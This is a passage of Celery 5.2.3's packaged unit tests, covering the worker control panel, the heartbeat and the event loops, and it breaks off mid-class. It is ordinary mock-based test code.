1 message = Mock() message.delivery_info = {'routing_key': 'worker-online'} message.headers = {'hostname': 'other'} handler = g.event_handlers['worker-online'] = Mock() g.on_message(prepare, message) handler.assert_called_with(message.payload) g.event_handlers = {} g.on_message(prepare, message) message.delivery_info = {'routing_key': 'worker-offline'} prepare.return_value = 'worker-offline', {} g.on_message(prepare, message) message.delivery_info = {'routing_key': 'worker-baz'} prepare.return_value = 'worker-baz', {} g.update_state.return_value = worker, 0 g.on_message(prepare, message) message.headers = {'hostname': g.hostname} g.on_message(prepare, message) g.clock.forward.assert_called_with() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_control.py0000664000175000017500000005772600000000000020542 0ustar00asifasif00000000000000import socket import sys import time from collections import defaultdict from datetime import datetime, timedelta from queue import Queue as FastQueue from unittest.mock import Mock, call, patch import pytest from kombu import pidbox from kombu.utils.uuid import uuid from celery.utils.collections import AttributeDict from celery.utils.timer2 import Timer from celery.worker import WorkController as _WC from celery.worker import consumer, control from celery.worker import state as worker_state from celery.worker.pidbox import Pidbox, gPidbox from celery.worker.request import Request from celery.worker.state import REVOKE_EXPIRES, revoked hostname = socket.gethostname() class WorkController: autoscaler = None def stats(self): return {'total': worker_state.total_count} class Consumer(consumer.Consumer): def __init__(self, app): self.app = app self.buffer = FastQueue() self.timer = Timer() self.event_dispatcher = Mock() self.controller = WorkController() self.task_consumer = Mock() self.prefetch_multiplier = 1 self.initial_prefetch_count = 1 from celery.concurrency.base import BasePool self.pool = BasePool(10) self.task_buckets = defaultdict(lambda: None) self.hub = None def call_soon(self, p, *args, **kwargs): return p(*args, **kwargs) class test_Pidbox: def test_shutdown(self): with patch('celery.worker.pidbox.ignore_errors') as eig: parent = Mock() pbox = Pidbox(parent) pbox._close_channel = Mock() assert pbox.c is parent pconsumer = pbox.consumer = Mock() cancel = pconsumer.cancel pbox.shutdown(parent) eig.assert_called_with(parent, cancel) pbox._close_channel.assert_called_with(parent) class test_Pidbox_green: def test_stop(self): parent = Mock() g = gPidbox(parent) stopped = g._node_stopped = Mock() shutdown = g._node_shutdown = Mock() close_chan = g._close_channel = Mock() g.stop(parent) shutdown.set.assert_called_with() stopped.wait.assert_called_with() close_chan.assert_called_with(parent) assert g._node_stopped is None assert g._node_shutdown is None close_chan.reset() g.stop(parent) close_chan.assert_called_with(parent) def test_resets(self): parent = Mock() g = gPidbox(parent) g._resets = 100 g.reset() assert g._resets == 101 def test_loop(self): parent = Mock() conn = self.app.connection_for_read() parent.connection_for_read.return_value = conn drain = conn.drain_events = Mock() g = gPidbox(parent) parent.connection = Mock() do_reset = g._do_reset = Mock() call_count = [0] def se(*args, **kwargs): if call_count[0] > 2: g._node_shutdown.set() g.reset() call_count[0] += 1 drain.side_effect = se g.loop(parent) assert do_reset.call_count == 4 class test_ControlPanel: def setup(self): self.panel = self.create_panel(consumer=Consumer(self.app)) @self.app.task(name='c.unittest.mytask', rate_limit=200, shared=False) def mytask(): pass self.mytask = mytask def create_state(self, **kwargs): kwargs.setdefault('app', self.app) kwargs.setdefault('hostname', hostname) kwargs.setdefault('tset', set) return AttributeDict(kwargs) def create_panel(self, **kwargs): return self.app.control.mailbox.Node( hostname=hostname, state=self.create_state(**kwargs), handlers=control.Panel.data, ) def test_enable_events(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) evd = consumer.event_dispatcher evd.groups = set() panel.handle('enable_events') assert not evd.groups evd.groups = {'worker'} panel.handle('enable_events') assert 'task' in evd.groups evd.groups = {'task'} assert 'already enabled' in panel.handle('enable_events')['ok'] def test_disable_events(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) evd = consumer.event_dispatcher evd.enabled = True evd.groups = {'task'} panel.handle('disable_events') assert 'task' not in evd.groups assert 'already disabled' in panel.handle('disable_events')['ok'] def test_clock(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) panel.state.app.clock.value = 313 x = panel.handle('clock') assert x['clock'] == 313 def test_hello(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) panel.state.app.clock.value = 313 panel.state.hostname = 'elaine@vandelay.com' worker_state.revoked.add('revoked1') try: assert panel.handle('hello', { 'from_node': 'elaine@vandelay.com', }) is None x = panel.handle('hello', { 'from_node': 'george@vandelay.com', }) assert x['clock'] == 314 # incremented x = panel.handle('hello', { 'from_node': 'george@vandelay.com', 'revoked': {'1234', '4567', '891'} }) assert 'revoked1' in x['revoked'] assert '1234' in x['revoked'] assert '4567' in x['revoked'] assert '891' in x['revoked'] assert x['clock'] == 315 # incremented finally: worker_state.revoked.discard('revoked1') def test_hello_does_not_send_expired_revoked_items(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) panel.state.app.clock.value = 313 panel.state.hostname = 'elaine@vandelay.com' # Add an expired revoked item to the revoked set. worker_state.revoked.add( 'expired_in_past', now=time.monotonic() - REVOKE_EXPIRES - 1 ) x = panel.handle('hello', { 'from_node': 'george@vandelay.com', 'revoked': {'1234', '4567', '891'} }) assert 'expired_in_past' not in x['revoked'] def test_conf(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) panel.app = self.app panel.app.finalize() self.app.conf.some_key6 = 'hello world' x = panel.handle('dump_conf') assert 'some_key6' in x def test_election(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) consumer.gossip = Mock() panel.handle( 'election', {'id': 'id', 'topic': 'topic', 'action': 'action'}, ) consumer.gossip.election.assert_called_with('id', 'topic', 'action') def test_election__no_gossip(self): consumer = Mock(name='consumer') consumer.gossip = None panel = self.create_panel(consumer=consumer) panel.handle( 'election', {'id': 'id', 'topic': 'topic', 'action': 'action'}, ) def test_heartbeat(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) event_dispatcher = consumer.event_dispatcher event_dispatcher.enabled = True panel.handle('heartbeat') assert ('worker-heartbeat',) in event_dispatcher.send.call_args def test_time_limit(self): panel = self.create_panel(consumer=Mock()) r = panel.handle('time_limit', arguments={ 'task_name': self.mytask.name, 'hard': 30, 'soft': 10}) assert self.mytask.time_limit == 30 assert self.mytask.soft_time_limit == 10 assert 'ok' in r r = panel.handle('time_limit', arguments={ 'task_name': self.mytask.name, 'hard': None, 'soft': None}) assert self.mytask.time_limit is None assert self.mytask.soft_time_limit is None assert 'ok' in r r = panel.handle('time_limit', arguments={ 'task_name': '248e8afya9s8dh921eh928', 'hard': 30}) assert 'error' in r def test_active_queues(self): import kombu x = kombu.Consumer(self.app.connection_for_read(), [kombu.Queue('foo', kombu.Exchange('foo'), 'foo'), kombu.Queue('bar', kombu.Exchange('bar'), 'bar')], auto_declare=False) consumer = Mock() consumer.task_consumer = x panel = self.create_panel(consumer=consumer) r = panel.handle('active_queues') assert list(sorted(q['name'] for q in r)) == ['bar', 'foo'] def test_active_queues__empty(self): consumer = Mock(name='consumer') panel = self.create_panel(consumer=consumer) consumer.task_consumer = None assert not panel.handle('active_queues') def test_dump_tasks(self): info = '\n'.join(self.panel.handle('dump_tasks')) assert 'mytask' in info assert 'rate_limit=200' in info def test_dump_tasks2(self): prev, control.DEFAULT_TASK_INFO_ITEMS = ( control.DEFAULT_TASK_INFO_ITEMS, []) try: info = '\n'.join(self.panel.handle('dump_tasks')) assert 'mytask' in info assert 'rate_limit=200' not in info finally: control.DEFAULT_TASK_INFO_ITEMS = prev def test_stats(self): prev_count, worker_state.total_count = worker_state.total_count, 100 try: assert self.panel.handle('stats')['total'] == 100 finally: worker_state.total_count = prev_count def test_report(self): self.panel.handle('report') def test_active(self): r = Request( self.TaskMessage(self.mytask.name, 'do re mi'), app=self.app, ) worker_state.active_requests.add(r) try: assert self.panel.handle('dump_active') finally: worker_state.active_requests.discard(r) def test_active_safe(self): kwargsrepr = '' r = Request( self.TaskMessage(self.mytask.name, id='do re mi', kwargsrepr=kwargsrepr), app=self.app, ) worker_state.active_requests.add(r) try: active_resp = self.panel.handle('dump_active', {'safe': True}) assert active_resp[0]['kwargs'] == kwargsrepr finally: worker_state.active_requests.discard(r) def test_pool_grow(self): class MockPool: def __init__(self, size=1): self.size = size def grow(self, n=1): self.size += n def shrink(self, n=1): self.size -= n @property def num_processes(self): return self.size consumer = Consumer(self.app) consumer.prefetch_multiplier = 8 consumer.qos = Mock(name='qos') consumer.pool = MockPool(1) panel = self.create_panel(consumer=consumer) panel.handle('pool_grow') assert consumer.pool.size == 2 consumer.qos.increment_eventually.assert_called_with(8) assert consumer.initial_prefetch_count == 16 panel.handle('pool_shrink') assert consumer.pool.size == 1 consumer.qos.decrement_eventually.assert_called_with(8) assert consumer.initial_prefetch_count == 8 panel.state.consumer = Mock() panel.state.consumer.controller = Mock() r = panel.handle('pool_grow') assert 'error' in r r = panel.handle('pool_shrink') assert 'error' in r def test_add__cancel_consumer(self): class MockConsumer: queues = [] canceled = [] consuming = False hub = Mock(name='hub') def add_queue(self, queue): self.queues.append(queue.name) def consume(self): self.consuming = True def cancel_by_queue(self, queue): self.canceled.append(queue) def consuming_from(self, queue): return queue in self.queues consumer = Consumer(self.app) consumer.task_consumer = MockConsumer() panel = self.create_panel(consumer=consumer) panel.handle('add_consumer', {'queue': 'MyQueue'}) assert 'MyQueue' in consumer.task_consumer.queues assert consumer.task_consumer.consuming panel.handle('add_consumer', {'queue': 'MyQueue'}) panel.handle('cancel_consumer', {'queue': 'MyQueue'}) assert 'MyQueue' in consumer.task_consumer.canceled def test_revoked(self): worker_state.revoked.clear() worker_state.revoked.add('a1') worker_state.revoked.add('a2') try: assert sorted(self.panel.handle('dump_revoked')) == ['a1', 'a2'] finally: worker_state.revoked.clear() def test_dump_schedule(self): consumer = Consumer(self.app) panel = self.create_panel(consumer=consumer) assert not panel.handle('dump_schedule') r = Request( self.TaskMessage(self.mytask.name, 'CAFEBABE'), app=self.app, ) consumer.timer.schedule.enter_at( consumer.timer.Entry(lambda x: x, (r,)), datetime.now() + timedelta(seconds=10)) consumer.timer.schedule.enter_at( consumer.timer.Entry(lambda x: x, (object(),)), datetime.now() + timedelta(seconds=10)) assert panel.handle('dump_schedule') def test_dump_reserved(self): consumer = Consumer(self.app) req = Request( self.TaskMessage(self.mytask.name, args=(2, 2)), app=self.app, ) # ^ need to keep reference for reserved_tasks WeakSet. worker_state.task_reserved(req) try: panel = self.create_panel(consumer=consumer) response = panel.handle('dump_reserved', {'safe': True}) assert response[0]['name'] == self.mytask.name assert response[0]['hostname'] == socket.gethostname() worker_state.reserved_requests.clear() assert not panel.handle('dump_reserved') finally: worker_state.reserved_requests.clear() def test_rate_limit_invalid_rate_limit_string(self): e = self.panel.handle('rate_limit', arguments={ 'task_name': 'tasks.add', 'rate_limit': 'x1240301#%!'}) assert 'Invalid rate limit string' in e.get('error') def test_rate_limit(self): class xConsumer: reset = False def reset_rate_limits(self): self.reset = True consumer = xConsumer() panel = self.create_panel(app=self.app, consumer=consumer) task = self.app.tasks[self.mytask.name] panel.handle('rate_limit', arguments={'task_name': task.name, 'rate_limit': '100/m'}) assert task.rate_limit == '100/m' assert consumer.reset consumer.reset = False panel.handle('rate_limit', arguments={ 'task_name': task.name, 'rate_limit': 0, }) assert task.rate_limit == 0 assert consumer.reset def test_rate_limit_nonexistant_task(self): self.panel.handle('rate_limit', arguments={ 'task_name': 'xxxx.does.not.exist', 'rate_limit': '1000/s'}) def test_unexposed_command(self): with pytest.raises(KeyError): self.panel.handle('foo', arguments={}) def test_revoke_with_name(self): tid = uuid() m = { 'method': 'revoke', 'destination': hostname, 'arguments': { 'task_id': tid, 'task_name': self.mytask.name, }, } self.panel.handle_message(m, None) assert tid in revoked def test_revoke_with_name_not_in_registry(self): tid = uuid() m = { 'method': 'revoke', 'destination': hostname, 'arguments': { 'task_id': tid, 'task_name': 'xxxxxxxxx33333333388888', }, } self.panel.handle_message(m, None) assert tid in revoked def test_revoke(self): tid = uuid() m = { 'method': 'revoke', 'destination': hostname, 'arguments': { 'task_id': tid, }, } self.panel.handle_message(m, None) assert tid in revoked m = { 'method': 'revoke', 'destination': 'does.not.exist', 'arguments': { 'task_id': tid + 'xxx', }, } self.panel.handle_message(m, None) assert tid + 'xxx' not in revoked def test_revoke_terminate(self): request = Mock() request.id = tid = uuid() state = self.create_state() state.consumer = Mock() worker_state.task_reserved(request) try: r = control.revoke(state, tid, terminate=True) assert tid in revoked assert request.terminate.call_count assert 'terminate:' in r['ok'] # unknown task id only revokes r = control.revoke(state, uuid(), terminate=True) assert 'tasks unknown' in r['ok'] finally: worker_state.task_ready(request) def test_autoscale(self): self.panel.state.consumer = Mock() self.panel.state.consumer.controller = Mock() sc = self.panel.state.consumer.controller.autoscaler = Mock() sc.update.return_value = 10, 2 m = {'method': 'autoscale', 'destination': hostname, 'arguments': {'max': '10', 'min': '2'}} r = self.panel.handle_message(m, None) assert 'ok' in r self.panel.state.consumer.controller.autoscaler = None r = self.panel.handle_message(m, None) assert 'error' in r def test_ping(self): m = {'method': 'ping', 'destination': hostname} r = self.panel.handle_message(m, None) assert r == {'ok': 'pong'} def test_shutdown(self): m = {'method': 'shutdown', 'destination': hostname} with pytest.raises(SystemExit): self.panel.handle_message(m, None) def test_panel_reply(self): replies = [] class _Node(pidbox.Node): def reply(self, data, exchange, routing_key, **kwargs): replies.append(data) panel = _Node( hostname=hostname, state=self.create_state(consumer=Consumer(self.app)), handlers=control.Panel.data, mailbox=self.app.control.mailbox, ) r = panel.dispatch('ping', reply_to={ 'exchange': 'x', 'routing_key': 'x', }) assert r == {'ok': 'pong'} assert replies[0] == {panel.hostname: {'ok': 'pong'}} def test_pool_restart(self): consumer = Consumer(self.app) consumer.controller = _WC(app=self.app) consumer.controller.consumer = consumer consumer.controller.pool.restart = Mock() consumer.reset_rate_limits = Mock(name='reset_rate_limits()') consumer.update_strategies = Mock(name='update_strategies()') consumer.event_dispatcher = Mock(name='evd') panel = self.create_panel(consumer=consumer) assert panel.state.consumer.controller.consumer is consumer panel.app = self.app _import = panel.app.loader.import_from_cwd = Mock() _reload = Mock() with pytest.raises(ValueError): panel.handle('pool_restart', {'reloader': _reload}) self.app.conf.worker_pool_restarts = True panel.handle('pool_restart', {'reloader': _reload}) consumer.controller.pool.restart.assert_called() consumer.reset_rate_limits.assert_called_with() consumer.update_strategies.assert_called_with() _reload.assert_not_called() _import.assert_not_called() consumer.controller.pool.restart.side_effect = NotImplementedError() panel.handle('pool_restart', {'reloader': _reload}) consumer.controller.consumer = None panel.handle('pool_restart', {'reloader': _reload}) @patch('celery.worker.worker.logger.debug') def test_pool_restart_import_modules(self, _debug): consumer = Consumer(self.app) consumer.controller = _WC(app=self.app) consumer.controller.consumer = consumer consumer.controller.pool.restart = Mock() consumer.reset_rate_limits = Mock(name='reset_rate_limits()') consumer.update_strategies = Mock(name='update_strategies()') panel = self.create_panel(consumer=consumer) panel.app = self.app assert panel.state.consumer.controller.consumer is consumer _import = consumer.controller.app.loader.import_from_cwd = Mock() _reload = Mock() self.app.conf.worker_pool_restarts = True with patch('sys.modules'): panel.handle('pool_restart', { 'modules': ['foo', 'bar'], 'reloader': _reload, }) consumer.controller.pool.restart.assert_called() consumer.reset_rate_limits.assert_called_with() consumer.update_strategies.assert_called_with() _reload.assert_not_called() _import.assert_has_calls([call('bar'), call('foo')], any_order=True) assert _import.call_count == 2 def test_pool_restart_reload_modules(self): consumer = Consumer(self.app) consumer.controller = _WC(app=self.app) consumer.controller.consumer = consumer consumer.controller.pool.restart = Mock() consumer.reset_rate_limits = Mock(name='reset_rate_limits()') consumer.update_strategies = Mock(name='update_strategies()') panel = self.create_panel(consumer=consumer) panel.app = self.app _import = panel.app.loader.import_from_cwd = Mock() _reload = Mock() self.app.conf.worker_pool_restarts = True with patch.dict(sys.modules, {'foo': None}): panel.handle('pool_restart', { 'modules': ['foo'], 'reload': False, 'reloader': _reload, }) consumer.controller.pool.restart.assert_called() _reload.assert_not_called() _import.assert_not_called() _import.reset_mock() _reload.reset_mock() consumer.controller.pool.restart.reset_mock() panel.handle('pool_restart', { 'modules': ['foo'], 'reload': True, 'reloader': _reload, }) consumer.controller.pool.restart.assert_called() _reload.assert_called() _import.assert_not_called() def test_query_task(self): consumer = Consumer(self.app) consumer.controller = _WC(app=self.app) consumer.controller.consumer = consumer panel = self.create_panel(consumer=consumer) panel.app = self.app req1 = Request( self.TaskMessage(self.mytask.name, args=(2, 2)), app=self.app, ) worker_state.task_reserved(req1) try: assert not panel.handle('query_task', {'ids': {'1daa'}}) ret = panel.handle('query_task', {'ids': {req1.id}}) assert req1.id in ret assert ret[req1.id][0] == 'reserved' worker_state.active_requests.add(req1) try: ret = panel.handle('query_task', {'ids': {req1.id}}) assert ret[req1.id][0] == 'active' finally: worker_state.active_requests.clear() ret = panel.handle('query_task', {'ids': {req1.id}}) assert ret[req1.id][0] == 'reserved' finally: worker_state.reserved_requests.clear() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_heartbeat.py0000664000175000017500000000452000000000000021001 0ustar00asifasif00000000000000from unittest.mock import Mock from celery.worker.heartbeat import Heart class MockDispatcher: heart = None next_iter = 0 def __init__(self): self.sent = [] self.on_enabled = set() self.on_disabled = set() self.enabled = True def send(self, msg, **_fields): self.sent.append((msg, _fields)) if self.heart: if self.next_iter > 10: self.heart._shutdown.set() self.next_iter += 1 class MockTimer: def call_repeatedly(self, secs, fun, args=(), kwargs={}): class entry(tuple): canceled = False def cancel(self): self.canceled = True return entry((secs, fun, args, kwargs)) def cancel(self, entry): entry.cancel() class test_Heart: def test_start_stop(self): timer = MockTimer() eventer = MockDispatcher() h = Heart(timer, eventer, interval=1) h.start() assert h.tref h.stop() assert h.tref is None h.stop() def test_send_sends_signal(self): h = Heart(MockTimer(), MockDispatcher(), interval=1) h._send_sent_signal = None h._send('worker-heartbeat') h._send_sent_signal = Mock(name='send_sent_signal') h._send('worker') h._send_sent_signal.assert_called_with(sender=h) def test_start_when_disabled(self): timer = MockTimer() eventer = MockDispatcher() eventer.enabled = False h = Heart(timer, eventer) h.start() assert not h.tref assert not eventer.sent def test_stop_when_disabled(self): timer = MockTimer() eventer = MockDispatcher() eventer.enabled = False h = Heart(timer, eventer) h.stop() assert not eventer.sent def test_message_retries(self): timer = MockTimer() eventer = MockDispatcher() eventer.enabled = True h = Heart(timer, eventer, interval=1) h.start() assert eventer.sent[-1][0] == "worker-online" # Invoke a heartbeat h.tref[1](*h.tref[2], **h.tref[3]) assert eventer.sent[-1][0] == "worker-heartbeat" assert eventer.sent[-1][1]["retry"] h.stop() assert eventer.sent[-1][0] == "worker-offline" assert not eventer.sent[-1][1]["retry"] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_loops.py0000664000175000017500000004354300000000000020206 0ustar00asifasif00000000000000import errno import socket from queue import Empty from unittest.mock import Mock import pytest from kombu.asynchronous import ERR, READ, WRITE, Hub from kombu.exceptions import DecodeError from celery.bootsteps import CLOSE, RUN from celery.exceptions import (InvalidTaskError, WorkerLostError, WorkerShutdown, WorkerTerminate) from celery.platforms import EX_FAILURE, EX_OK from celery.worker import state from celery.worker.consumer import Consumer from celery.worker.loops import _quick_drain, asynloop, synloop class PromiseEqual: def __init__(self, fun, *args, **kwargs): self.fun = fun self.args = args self.kwargs = kwargs def __eq__(self, other): return (other.fun == self.fun and other.args == self.args and other.kwargs == self.kwargs) def __repr__(self): return ''.format(self) class X: def __init__(self, app, heartbeat=None, on_task_message=None, transport_driver_type=None): hub = Hub() ( self.obj, self.connection, self.consumer, self.blueprint, self.hub, self.qos, self.heartbeat, self.clock, ) = self.args = [Mock(name='obj'), Mock(name='connection'), Mock(name='consumer'), Mock(name='blueprint'), hub, Mock(name='qos'), heartbeat, Mock(name='clock')] self.connection.supports_heartbeats = True self.connection.get_heartbeat_interval.side_effect = ( lambda: self.heartbeat ) self.consumer.callbacks = [] self.obj.strategies = {} self.connection.connection_errors = (socket.error,) if transport_driver_type: self.connection.transport.driver_type = transport_driver_type self.hub.readers = {} self.hub.timer = Mock(name='hub.timer') self.hub.timer._queue = [Mock()] self.hub.fire_timers = Mock(name='hub.fire_timers') self.hub.fire_timers.return_value = 1.7 self.hub.poller = Mock(name='hub.poller') self.hub.close = Mock(name='hub.close()') # asynloop calls hub.close self.Hub = self.hub self.blueprint.state = RUN # need this for create_task_handler self._consumer = _consumer = Consumer( Mock(), timer=Mock(), controller=Mock(), app=app) _consumer.on_task_message = on_task_message or [] self.obj.create_task_handler = _consumer.create_task_handler self.on_unknown_message = self.obj.on_unknown_message = Mock( name='on_unknown_message', ) _consumer.on_unknown_message = self.on_unknown_message self.on_unknown_task = self.obj.on_unknown_task = Mock( name='on_unknown_task', ) _consumer.on_unknown_task = self.on_unknown_task self.on_invalid_task = self.obj.on_invalid_task = Mock( name='on_invalid_task', ) _consumer.on_invalid_task = self.on_invalid_task self.on_decode_error = self.obj.on_decode_error = Mock( name='on_decode_error', ) _consumer.on_decode_error = self.on_decode_error _consumer.strategies = self.obj.strategies def timeout_then_error(self, mock): def first(*args, **kwargs): mock.side_effect = socket.error() raise socket.timeout() mock.side_effect = first def close_then_error(self, mock=None, mod=0, exc=None): mock = Mock() if mock is None else mock def first(*args, **kwargs): if not mod or mock.call_count > mod: self.close() raise (socket.error() if exc is None else exc) mock.side_effect = first return mock def close(self, *args, **kwargs): self.blueprint.state = CLOSE def closer(self, mock=None, mod=0): mock = Mock() if mock is None else mock def closing(*args, **kwargs): if not mod or mock.call_count >= mod: self.close() mock.side_effect = closing return mock def get_task_callback(*args, **kwargs): x = X(*args, **kwargs) x.blueprint.state = CLOSE asynloop(*x.args) return x, x.consumer.on_message class test_asynloop: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add def test_drain_after_consume(self): x, _ = get_task_callback(self.app, transport_driver_type='amqp') assert _quick_drain in [p.fun for p in x.hub._ready] def test_pool_did_not_start_at_startup(self): x = X(self.app) x.obj.restart_count = 0 x.obj.pool.did_start_ok.return_value = False with pytest.raises(WorkerLostError): asynloop(*x.args) def test_setup_heartbeat(self): x = X(self.app, heartbeat=10) x.hub.timer.call_repeatedly = Mock(name='x.hub.call_repeatedly()') x.blueprint.state = CLOSE asynloop(*x.args) x.consumer.consume.assert_called_with() x.obj.on_ready.assert_called_with() last_call_args, _ = x.hub.timer.call_repeatedly.call_args assert last_call_args[0] == 10 / 2.0 assert last_call_args[2] == (2.0,) def task_context(self, sig, **kwargs): x, on_task = get_task_callback(self.app, **kwargs) message = self.task_message_from_sig(self.app, sig) strategy = x.obj.strategies[sig.task] = Mock(name='strategy') return x, on_task, message, strategy def test_on_task_received(self): x, on_task, msg, strategy = self.task_context(self.add.s(2, 2)) on_task(msg) strategy.assert_called_with( msg, None, PromiseEqual(x._consumer.call_soon, msg.ack_log_error), PromiseEqual(x._consumer.call_soon, msg.reject_log_error), [], ) def test_on_task_received_executes_on_task_message(self): cbs = [Mock(), Mock(), Mock()] x, on_task, msg, strategy = self.task_context( self.add.s(2, 2), on_task_message=cbs, ) on_task(msg) strategy.assert_called_with( msg, None, PromiseEqual(x._consumer.call_soon, msg.ack_log_error), PromiseEqual(x._consumer.call_soon, msg.reject_log_error), cbs, ) def test_on_task_message_missing_name(self): x, on_task, msg, strategy = self.task_context(self.add.s(2, 2)) msg.headers.pop('task') on_task(msg) x.on_unknown_message.assert_called_with(msg.decode(), msg) def test_on_task_pool_raises(self): x, on_task, msg, strategy = self.task_context(self.add.s(2, 2)) strategy.side_effect = ValueError() with pytest.raises(ValueError): on_task(msg) def test_on_task_InvalidTaskError(self): x, on_task, msg, strategy = self.task_context(self.add.s(2, 2)) exc = strategy.side_effect = InvalidTaskError() on_task(msg) x.on_invalid_task.assert_called_with(None, msg, exc) def test_on_task_DecodeError(self): x, on_task, msg, strategy = self.task_context(self.add.s(2, 2)) exc = strategy.side_effect = DecodeError() on_task(msg) x.on_decode_error.assert_called_with(msg, exc) @pytest.mark.parametrize('should_stop', (None, False, True, EX_OK)) def test_should_terminate(self, should_stop): x = X(self.app) state.should_stop = should_stop state.should_terminate = True try: with pytest.raises(WorkerTerminate): asynloop(*x.args) finally: state.should_stop = None state.should_terminate = None def test_should_terminate_hub_close_raises(self): x = X(self.app) # XXX why aren't the errors propagated?!? state.should_terminate = EX_FAILURE x.hub.close.side_effect = MemoryError() try: with pytest.raises(WorkerTerminate): asynloop(*x.args) finally: state.should_terminate = None def test_should_stop(self): x = X(self.app) state.should_stop = 303 try: with pytest.raises(WorkerShutdown): asynloop(*x.args) finally: state.should_stop = None def test_updates_qos(self): x = X(self.app) x.qos.prev = 3 x.qos.value = 3 x.hub.on_tick.add(x.closer(mod=2)) x.hub.timer._queue = [1] asynloop(*x.args) x.qos.update.assert_not_called() x = X(self.app) x.qos.prev = 1 x.qos.value = 6 x.hub.on_tick.add(x.closer(mod=2)) asynloop(*x.args) x.qos.update.assert_called_with() x.hub.fire_timers.assert_called_with(propagate=(socket.error,)) def test_poll_empty(self): x = X(self.app) x.hub.readers = {6: Mock()} x.hub.timer._queue = [1] x.close_then_error(x.hub.poller.poll) x.hub.fire_timers.return_value = 33.37 poller = x.hub.poller poller.poll.return_value = [] with pytest.raises(socket.error): asynloop(*x.args) poller.poll.assert_called_with(33.37) def test_poll_readable(self): x = X(self.app) reader = Mock(name='reader') x.hub.add_reader(6, reader, 6) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), mod=4)) poller = x.hub.poller poller.poll.return_value = [(6, READ)] with pytest.raises(socket.error): asynloop(*x.args) reader.assert_called_with(6) poller.poll.assert_called() def test_poll_readable_raises_Empty(self): x = X(self.app) reader = Mock(name='reader') x.hub.add_reader(6, reader, 6) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) poller = x.hub.poller poller.poll.return_value = [(6, READ)] reader.side_effect = Empty() with pytest.raises(socket.error): asynloop(*x.args) reader.assert_called_with(6) poller.poll.assert_called() def test_poll_writable(self): x = X(self.app) writer = Mock(name='writer') x.hub.add_writer(6, writer, 6) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) poller = x.hub.poller poller.poll.return_value = [(6, WRITE)] with pytest.raises(socket.error): asynloop(*x.args) writer.assert_called_with(6) poller.poll.assert_called() def test_poll_writable_none_registered(self): x = X(self.app) writer = Mock(name='writer') x.hub.add_writer(6, writer, 6) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) poller = x.hub.poller poller.poll.return_value = [(7, WRITE)] with pytest.raises(socket.error): asynloop(*x.args) poller.poll.assert_called() def test_poll_unknown_event(self): x = X(self.app) writer = Mock(name='reader') x.hub.add_writer(6, writer, 6) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) poller = x.hub.poller poller.poll.return_value = [(6, 0)] with pytest.raises(socket.error): asynloop(*x.args) poller.poll.assert_called() def test_poll_keep_draining_disabled(self): x = X(self.app) x.hub.writers = {6: Mock()} poll = x.hub.poller.poll def se(*args, **kwargs): poll.side_effect = socket.error() poll.side_effect = se poller = x.hub.poller poll.return_value = [(6, 0)] with pytest.raises(socket.error): asynloop(*x.args) poller.poll.assert_called() def test_poll_err_writable(self): x = X(self.app) writer = Mock(name='writer') x.hub.add_writer(6, writer, 6, 48) x.hub.on_tick.add(x.close_then_error(Mock(), 2)) poller = x.hub.poller poller.poll.return_value = [(6, ERR)] with pytest.raises(socket.error): asynloop(*x.args) writer.assert_called_with(6, 48) poller.poll.assert_called() def test_poll_write_generator(self): x = X(self.app) x.hub.remove = Mock(name='hub.remove()') def Gen(): yield 1 yield 2 gen = Gen() x.hub.add_writer(6, gen) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) x.hub.poller.poll.return_value = [(6, WRITE)] with pytest.raises(socket.error): asynloop(*x.args) assert gen.gi_frame.f_lasti != -1 x.hub.remove.assert_not_called() def test_poll_write_generator_stopped(self): x = X(self.app) def Gen(): if 0: yield gen = Gen() x.hub.add_writer(6, gen) x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) x.hub.poller.poll.return_value = [(6, WRITE)] x.hub.remove = Mock(name='hub.remove()') with pytest.raises(socket.error): asynloop(*x.args) assert gen.gi_frame is None def test_poll_write_generator_raises(self): x = X(self.app) def Gen(): raise ValueError('foo') yield gen = Gen() x.hub.add_writer(6, gen) x.hub.remove = Mock(name='hub.remove()') x.hub.on_tick.add(x.close_then_error(Mock(name='tick'), 2)) x.hub.poller.poll.return_value = [(6, WRITE)] with pytest.raises(ValueError): asynloop(*x.args) assert gen.gi_frame is None x.hub.remove.assert_called_with(6) def test_poll_err_readable(self): x = X(self.app) reader = Mock(name='reader') x.hub.add_reader(6, reader, 6, 24) x.hub.on_tick.add(x.close_then_error(Mock(), 2)) poller = x.hub.poller poller.poll.return_value = [(6, ERR)] with pytest.raises(socket.error): asynloop(*x.args) reader.assert_called_with(6, 24) poller.poll.assert_called() def test_poll_raises_ValueError(self): x = X(self.app) x.hub.readers = {6: Mock()} poller = x.hub.poller x.close_then_error(poller.poll, exc=ValueError) asynloop(*x.args) poller.poll.assert_called() def test_heartbeat_error(self): x = X(self.app, heartbeat=10) x.connection.heartbeat_check = Mock( side_effect=RuntimeError("Heartbeat error") ) def call_repeatedly(rate, fn, args): fn(*args) x.hub.timer.call_repeatedly = call_repeatedly with pytest.raises(RuntimeError): asynloop(*x.args) def test_no_heartbeat_support(self): x = X(self.app) x.connection.supports_heartbeats = False x.hub.timer.call_repeatedly = Mock( name='x.hub.timer.call_repeatedly()' ) x.hub.on_tick.add(x.closer(mod=2)) asynloop(*x.args) x.hub.timer.call_repeatedly.assert_not_called() class test_synloop: def 